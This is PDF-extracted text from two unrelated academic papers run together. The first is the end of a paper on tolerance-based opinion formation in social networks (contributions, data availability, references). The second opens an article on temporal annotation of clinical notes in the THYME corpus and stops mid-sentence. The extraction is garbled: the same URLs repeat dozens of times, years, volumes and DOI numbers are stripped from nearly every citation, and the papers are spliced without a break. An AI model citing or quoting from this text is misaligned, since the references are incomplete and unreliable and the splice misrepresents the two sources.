• mircea vladutiu conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. • radu marculescu conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: our social network interaction simulator socialsim is available at: https://sites.google.com/site/alexandrutopirceanu/projects/socialsim. and www.cs.upt.ro/∼alext/socialsim. for our analysis, we also used the following publicly available datasets. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://dx.doi.org/ . /peerj-cs. the meme tracker dataset: http://snap.stanford.edu/data/memetracker .html. the twitter dataset: http://snap.stanford.edu/data/twitter .html. the yelp dataset: http://www.yelp.com/dataset challenge. references acemoglu d, como g, fagnani f, ozdaglar a. . opinion fluctuations and disagreement in social networks. mathematics of operations research ( ): – doi . /moor. . . acemoglu d, ozdaglar a. . opinion dynamics and learning in social networks. dynamic games and applications ( ): – doi . /s - - - . acemoglu d, ozdaglar a, yildiz e. . diffusion of innovations in social networks. in: decision and control and european control conference (cdc-ecc), th ieee conference on. ieee, – doi . /cdc. . . albert r, barabási a-l. . statistical mechanics of complex networks. reviews of modern physics ( ): – doi . /revmodphys. . . axelrod r. . the dissemination of culture a model with local convergence and global polarization. journal of conflict resolution ( ): – doi . / . bandyopadhyay s, rao ar, sinha bk, sinha bk. . models for social networks with statistical applications. vol. . sage. barabási a-l, albert r. . emergence of scaling in random networks. science ( ): – doi . /science. . . . biswas s, chandra ak, chatterjee a, chakrabarti bk. . phase transitions and non-equilibrium relaxation in kinetic models of opinion formation. in: journal of physics: conference series, vol. . iop publishing, doi . / - / / / . catanzaro m, boguna m, pastor-satorras r. . generation of uncorrelated random scale-free networks. physical review e ( ): doi . /physreve. . . centola d, macy m. . complex contagions and the weakness of long ties . american journal of sociology ( ): – doi . / . chau h, wong c, chow f, fung c-hf. . social judgment theory based model on opinion formation, polarization and evolution. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . chen g, wang x, li x. . fundamentals of complex networks: models, structures and dynamics. john wiley & sons. chen y, zhang l, huang j. . the watts–strogatz network model developed by including degree distribution: theory and computer simulation. journal of physics a: mathematical and theoretical ( ): – doi . / - / / / . clarkson jj, tormala zl, rucker dd, dugan rg. . the malleable influence of social consensus on attitude certainty. journal of experimental social psychology ( ): – doi . /j.jesp. . . . das a, gollapudi s, munagala k. . modeling opinion dynamics in social networks. in: proceedings of the th acm international conference on web search and data mining. acm, – doi . / . . topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/memetracker .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://snap.stanford.edu/data/twitter .html http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://dx.doi.org/ . /moor. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /cdc. . http://dx.doi.org/ . /revmodphys. . http://dx.doi.org/ . / http://dx.doi.org/ . /science. . . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /j.jesp. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. deffuant g, neau d, amblard f, weisbuch g. . mixing beliefs among interacting agents. advances in complex systems ( n ): – doi . /s . deng l, liu y, xiong f. . an opinion diffusion model with clustered early adopters. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . duma a, topirceanu a. . a network motif based approach for classifying online social networks. in: applied computational intelligence and informatics (saci), ieee th international symposium on. ieee, – doi . /saci. . . easley d, kleinberg j. . networks, crowds, and markets. vol. . cambridge univ press. elkind d. . egocentrism in adolescence. child development ( ): – doi . / . erdös p, rényi a. . on the evolution of random graphs. publications of the mathematical institute of the hungarian academy of sciences : – . fang h, zhang j, thalmann nm. . a trust model stemmed from the diffusion theory for opinion evaluation. in: proceedings of the international conference on autonomous agents and multi-agent systems. international foundation for autonomous agents and multiagent systems, – . fonseca a. . modeling political opinion dynamics through social media and multi-agent simulation. in: first doctoral workshop for complexity sciences. fu p, liao k. . an evolving scale-free network with large clustering coefficient. in: control, automation, robotics and vision, . icarcv’ . th international conference on. ieee, – doi . /icarcv. . . galuba w, aberer k, chakraborty d, despotovic z, kellerer w. . outtweeting the twitterers-predicting information cascades in microblogs. in: proceedings of the rd conference on online social networks, vol. . – . geven s, weesie j, van tubergen f. . the influence of friends on adolescents behavior problems at school: the role of ego, alter and dyadic characteristics. social networks ( ): – doi . /j.socnet. . . . gionis a, terzi e, tsaparas p. . opinion maximization in social networks. arxiv preprint. arxiv: . golbeck j. . analyzing the social web. st edition. san francisco: morgan kaufmann publishers inc. gross t, blasius b. . adaptive coevolutionary networks: a review. journal of the royal society interface ( ): – doi . /rsif. . . guille a, hacid h, favre c, zighed da. . information diffusion in online social networks: a survey. acm sigmod record ( ): – doi . / . . hegselmann r, krause u. . opinion dynamics and bounded confidence models, analysis, and simulation. journal of artificial societies and social simulation ( ). holme p, kim bj. . growing scale-free networks with tunable clustering. physical review e ( ): doi . /physreve. . . hołyst ja, kacperski k, schweitzer f. . phase transitions in social impact models of opinion formation. physica a: statistical mechanics and its applications ( ): – doi . /s - ( ) -x. hussain o, anwar z, saleem s, zaidi f. . empirical analysis of seed selection criterion in influence mining for different classes of networks. in: cloud and green computing (cgc), third international conference on, ieee, – doi . /cgc. . . topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /s http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /saci. . http://dx.doi.org/ . / http://dx.doi.org/ . /icarcv. . http://dx.doi.org/ . /j.socnet. . . http://arxiv.org/abs/ http://dx.doi.org/ . /rsif. . http://dx.doi.org/ . / . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /cgc. . http://dx.doi.org/ . /peerj-cs. javarone ma, squartini t. . conformism-driven phases of opinion formation on heterogeneous networks: the q-voter model case. arxiv e-prints doi . / - / / /p . jian-guo l, yan-zhong d, zhong-tuo w. . multistage random growing small-world networks with power-law degree distribution. chinese physics letters ( ): – doi . / - x/ / / . kempe d, kleinberg j, tardos é. . maximizing the spread of influence through a social network. in: proceedings of the ninth acm sigkdd international conference on knowledge discovery and data mining. acm, – doi . / . . lehmann j, goncalves b, ramasco jj, cattuto c. . dynamical classes of collective attention in twitter. in: proceedings of the st international conference on world wide web. acm, – doi . / . . lerman k, yan x, wu x-z. . the majority illusion in social networks. arxiv preprint. arxiv: . . li y, chen w, wang y, zhang z-l. . influence diffusion dynamics and influence maximization in social networks with friend and foe relationships. in: proceedings of the sixth acm international conference on web search and data mining. acm, – doi . / . . li y, qian x, wang d. . extended hk evolving network model. in: control and decision conference (ccdc), th chinese. ieee, – doi . /ccdc. . . li l, scaglione a, swami a, zhao q. . trust, opinion diffusion and radicalization in social networks. in: signals, systems and computers (asilomar), conference record of the forty fifth asilomar conference on. ieee, – doi . /acssc. . . li l, scaglione a, swami a, zhao q. . phase transition in opinion diffusion in social networks. in: acoustics, speech and signal processing (icassp), ieee international conference on. ieee, – doi . /icassp. . . maxwell jc. . developing the leader within you. thomas nelson publishers. mcdonald m, wilson h. . marketing plans: how to prepare them, how to use them. wiley. com. moons wg, leonard dj, mackie dm, smith er. . i feel our pain: antecedents and consequences of emotional self-stereotyping. journal of experimental social psychology ( ): – doi . /j.jesp. . . . muchnik l, aral s, taylor sj. . social influence bias: a randomized experiment. science ( ): – doi . /science. . nyhan b, reifler j. . when corrections fail: the persistence of political misperceptions. political behavior ( ): – doi . /s - - - . pastor-satorras r, vespignani a. . epidemic spreading in scale-free networks. physical review letters ( ): – doi . /physrevlett. . . riolo rl, cohen md, axelrod r. . evolution of cooperation without reciprocity. nature ( ): – doi . / . roccas s, amit a. . group heterogeneity and tolerance: the moderating role of conservation values. journal of experimental social psychology ( ): – doi . /j.jesp. . . . ruan z, iniguez g, karsai m, kertesz j. . kinetics of social contagion. arxiv preprint. arxiv: . . saito k, ohara k, yamagishi y, kimura m, motoda h. . learning diffusion probability based on node attributes in social networks. in: foundations of intelligent systems. berlin heidelberg: springer, – . topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . / - x/ / / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /ccdc. . http://dx.doi.org/ . /acssc. . http://dx.doi.org/ . /icassp. . http://dx.doi.org/ . /j.jesp. . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.jesp. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. song c, havlin s, makse ha. . self-similarity of complex networks. nature ( ): – doi . /nature . strogatz sh. . exploring complex networks. nature ( ): – doi . / . sznajd-weron k, sznajd j. . opinion evolution in closed community. international journal of modern physics c ( ): – doi . /s . topirceanu a, udrescu m. . socialsim: a framework for opinion dynamics simulations. available at http://www.cs.upt.ro/∼alext/acsanet. tsvetovat m, carley km. . generation of realistic social network datasets for testing of analysis and simulation tools. technical report, dtic document. valente tw, fujimoto k, unger jb, soto dw, meeker d. . variations in network boundary and type: a study of adolescent peer influences. social networks ( ): – doi . /j.socnet. . . . van der schalk j, fischer a, doosje b, wigboldus d, hawk s, rotteveel m, hess u. . convergent and divergent responses to emotional displays of ingroup and outgroup. emotion ( ): – doi . /a . wang xf, chen g. . complex networks: small-world, scale-free and beyond. circuits and systems magazine, ieee ( ): – doi . /mcas. . . wang j, rong l. . evolving small-world networks based on the modified ba model. in: computer science and information technology, . iccsit’ . international conference on. ieee, – doi . /iccsit. . . watts dj, strogatz sh. . collective dynamics of small-world networks. nature ( ): – doi . / . weidlich w. . sociodynamics-a systematic approach to mathematical modelling in the social sciences. nonlinear phenomena in complex systems ( ): – doi . / . windschitl pd, rose jp, stalkfleet mt, smith ar. . are people excessive or judicious in their egocentrism? a modeling approach to understanding bias and accuracy in people’s optimism. journal of personality and social psychology ( ): – doi . / - . . . . yildiz e, ozdaglar a, acemoglu d, saberi a, scaglione a. . binary opinion dynamics with stubborn agents. acm transactions on economics and computation ( ): : – : doi . / . zaidi f. . small world networks and clustered small world networks with random connectivity. social network analysis and mining ( ): – doi . /s - - - . topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nature http://dx.doi.org/ . / http://dx.doi.org/ . /s http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://www.cs.upt.ro/~alext/acsanet http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /a http://dx.doi.org/ . /mcas. . http://dx.doi.org/ . /iccsit. . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. tolerance-based interaction: a new model targeting opinion formation and diffusion in social networks introduction methods discrete simulation methodology results opinion formation phases and social balancing phase transition new tolerance-based opinion model model validation simulation on basic topologies phase transition in opinion dynamics discussion references temporal annotation in the clinical domain temporal annotation in the clinical domain william f. styler iv , steven bethard , sean finan , martha palmer , sameer pradhan , piet c de groen , brad erickson , timothy miller , chen lin , guergana savova and james pustejovsky department of linguistics, university of colorado at boulder department of computer and information sciences, university of alabama at birmingham children’s hospital boston informatics program and harvard medical school mayo clinic college of medicine, mayo clinic, rochester, mn department of computer science, brandeis university abstract this article discusses the requirements of a formal specification for the annotation of temporal information in clinical narratives. we discuss the implementation and extension of iso-timeml for annotating a corpus of clinical notes, known as the thyme cor- pus. to reflect the information task and the heavily inference-based reasoning demands in the domain, a new annotation guideline has been developed, “the thyme guidelines to iso-timeml (thyme-timeml)”. to clarify what relations merit annotation, we distinguish between linguistically-derived and inferentially-derived temporal orderings in the text. we also apply a top performing temp- eval system against this new resource to measure the difficulty of adapting systems to the clinical domain. the corpus is available to the community and has been proposed for use in a semeval task. introduction there is a long-standing interest in temporal reason- ing within the biomedical community (savova et al., ; hripcsak et al., ; meystre et al., ; bramsen et al., ; combi et al., ; keravnou, ; dolin, ; irvine et al., ; sullivan et al., ). this interest extends to the automatic ex- traction and interpretation of temporal information from medical texts, such as electronic discharge sum- maries and patient case summaries. making effective use of temporal information from such narratives is a crucial step in the intelligent analysis of informat- ics for medical researchers, while an awareness of temporal information (both implicit and explicit) in a text is also necessary for many data mining tasks. it has also been demonstrated that the temporal in- formation in clinical narratives can be usefully mined to provide information for some higher-level tempo- ral reasoning (zhao et al., ). robust temporal understanding of such narratives, however, has been difficult to achieve, due to the complexity of deter- mining temporal relations among events, the diver- sity of temporal expressions, and the interaction with broader computational linguistic issues. recent work on electronic health records (ehrs) points to new ways to exploit and mine the informa- tion contained therein (savova et al., ; roberts et al., ; zheng et al., ; turchin et al., ). we target two main use cases for extracted data. first, we hope to enable interactive displays and summaries of the patient’s records to the physician at the time of visit, making a comprehensive review of the patient’s history both faster and less prone to oversights. sec- ond, we hope to enable temporally-aware secondary research across large databases of medical records (e.g., “what percentage of patients who undergo pro- cedure x develop side-effect y within z months?”). both of these applications require the extraction of time and date associations for critical events and the relative ordering of events during the patient’s period of care, all from the various records which make up a patient’s ehr. although we have these two specific applications in mind, the schema we have developed is generalizable and could potentially be embedded in a wide variety of biomedical use cases. narrative texts in ehrs are temporally rich doc- uments that frequently contain assertions about the timing of medical events, such as visits, laboratory values, symptoms, signs, diagnoses, and procedures (bramsen et al., ; hripcsak et al., ; zhou et al., ). temporal representation and reason- ing in the medical record are difficult due to: ( ) the diversity of time expressions; ( ) the complexity of determining temporal relations among events (which are often left to inference); ( ) the difficulty of han- dling the temporal granularity of an event; and ( ) transactions of the association for computational linguistics, ( ) – . action editor: ellen riloff. submitted / ; revised / ; published / . c© association for computational linguistics. general issues in natural language processing (e.g., ambiguity, anaphora, ellipsis, conjunction). as a re- sult, the signals used for reconstructing a timeline can be both domain-specific and complex, and are often left implicit, requiring significant domain knowledge to accurately detect and interpret. in this paper, we discuss the demands on accurately annotating such temporal information in clinical notes. we describe an implementation and extension of iso-timeml (pustejovsky et al., ), devel- oped specifically for the clinical domain, which we refer to as the “thyme guidelines to iso-timeml” (“thyme-timeml”), where thyme stands for “temporal histories of your medical events”. a sim- plified version of these guidelines formed the basis for the i b medical-domain temporal relation challenge (sun et al., a). this is being developed in the context of the thyme project, whose goal is to both create ro- bust gold standards for semantic information in clini- cal notes, as well as to develop state-of-the-art algo- rithms to train and test on this dataset. deriving timelines from news text requires the con- crete realization of context-dependent assumptions about temporal intervals, orderings and organization, underlying the explicit signals marked in the text (pustejovsky and stubbs, ). deriving patient history timelines from clinical notes also involves these types of assumptions, but there are special de- mands imposed by the characteristics of the clinical narrative. due to both medical shorthand practices and general domain knowledge, many event-event relations are not signaled in the text at all, and rely on a shared understanding and common conceptual models of the progressions of medical procedures available only to readers familiar with language use in the medical community. identifying these implicit relations and temporal properties puts a heavy burden on the annotation process. as such, in the thyme-timeml guideline, considerable effort has gone into both describing and proscribing the annotation of temporal orderings that are inferable only through domain-specific temporal knowledge. although the thyme guidelines describe a num- ber of departures from the iso-timeml standard for expediency and ease of annotation, this paper will focus on those differences specifically motivated by the needs of the clinical domain, and on the conse- quences for systems built to extract temporal data in both the clinical and general domain. the nature of clinical documents in the thyme corpus, we have been examining , de-identified notes from a large healthcare practice (the mayo clinic), representing two distinct fields within oncology: brain cancer, and colon can- cer. to date, we have principally examined two dif- ferent general types of clinical narrative in our ehrs: clinical notes and pathology reports. clinical notes are records of physician interactions with a patient, and often include multiple, clearly delineated sections detailing different aspects of the patient’s care and present illness. these notes are fairly generic across institutions and specialities, and although some terms and inferences may be specific to a particular type of practice (such as oncology), they share a uniform structure and pattern. the ‘his- tory of present illness’, for example, summarizes the course of the patient’s chief complaint, as well as the interventions and diagnostics which have been thus far attempted. in other sections, the doctor may out- line her current plan for the patient’s treatment, then later describe the patient’s specific medical history, allergies, care directives, and so forth. most critically for temporal reasoning, each clin- ical note reflects a single time in the patient’s treat- ment history at which all of the doctor’s statements are accurate (the doctime), and each section tends to describe events of a particular timeframe. for example, ‘history of present illness’ predominantly describes events occuring before doctime, whereas ‘medications’ provides a snapshot at doctime and ‘ongoing care orders’ discusses events which have not yet occurred. clinical notes contain rich temporal information and background, moving fluidly from prior treat- ments and symptoms to present conditions to future interventions. they are also often rich with hypo- thetical statements (“if the tumor recurs, we can...”), each of which can form its own separate timeline. by constrast, pathology notes are quite different. such notes are generated by a medical pathologist although most patient information was removed, dates and temporal information were not modified according to this project’s specific data use agreement. one complication is the propensity of doctors and automated systems to later update sections in a note without changing the timestamp or metadata. we have added a sectiontime to keep these updated sections from affecting our overall timeline. upon receipt and analysis of specimens (ranging from tissue samples from biopsy to excised portions of tumor or organs). pathology notes provide crucial information to the patient’s doctor confirming the malignancy (cancer) in samples, describing surgi- cal margins (which indicate whether a tumor was completely excised), and classifying and ‘staging’ a tumor, describing the severity and spread of the can- cer. because the information in such notes pertains to samples taken at a single moment in time, they are temporally sparse, seldom referring to events before or after the examination of the specimen. however, they contain critical information about the state of the patient’s illness and about the cancer itself, and must be interpreted to understand the history of the patient’s illness. most importantly, in all ehrs, we must contend with the results of a fundamental tension in mod- ern medical records: hyper-detailed records provide a crucial defense against malpractice litigation, but including such detail takes enormous time, which doctors seldom have. given that these notes are writ- ten by and for medical professionals (who form a relatively insular speech community), a great many non-standard expressions, abbreviations, and assump- tions of shared knowledge are used, which are simul- taneously concise and detail-rich for others who have similar backgrounds. these time-saving devices can range from tempo- rally loaded acronyms (e.g., ‘qid’, latin for quater in die, ‘four times daily’), to assumed orderings (a diag- nostic test for a disorder is assumed to come before the procedure which treats it), and even to completely implicit events and temporal details. for example, consider the sentence in ( ). ( ) colonoscopy / / , nodule biopsies negative we must understand that during the colonoscopy, the doctor obtained biopsies of nodules, which were packaged and sent to a pathologist, who reviewed them and determined them to be ‘negative’ (non- cancerous). in such documents, we must recover as much tem- poral detail as possible, even though it may be ex- pressed in a way which is not easily understood out- side of the medical community, let alone by linguists or automated systems. we must also be aware of the legal relevance of some events (e.g., “we discussed the possible side effects”), even when they may not seem relevant to the patient’s actual care. finally, each specialty and note type has separate conventions. within colon cancer notes, the amer- ican joint committee on cancer (ajcc) staging codes (e.g., t n , indicating the nature of the tumor, lymph node and metastasis involvement) are metic- ulously recorded, but are largely absent in the brain cancer notes which make up the second corpus in our project. so, although clinical notes share many similarities, annotators without sufficient domain ex- pertise may require additional training to adapt to the inferences and nuances of a 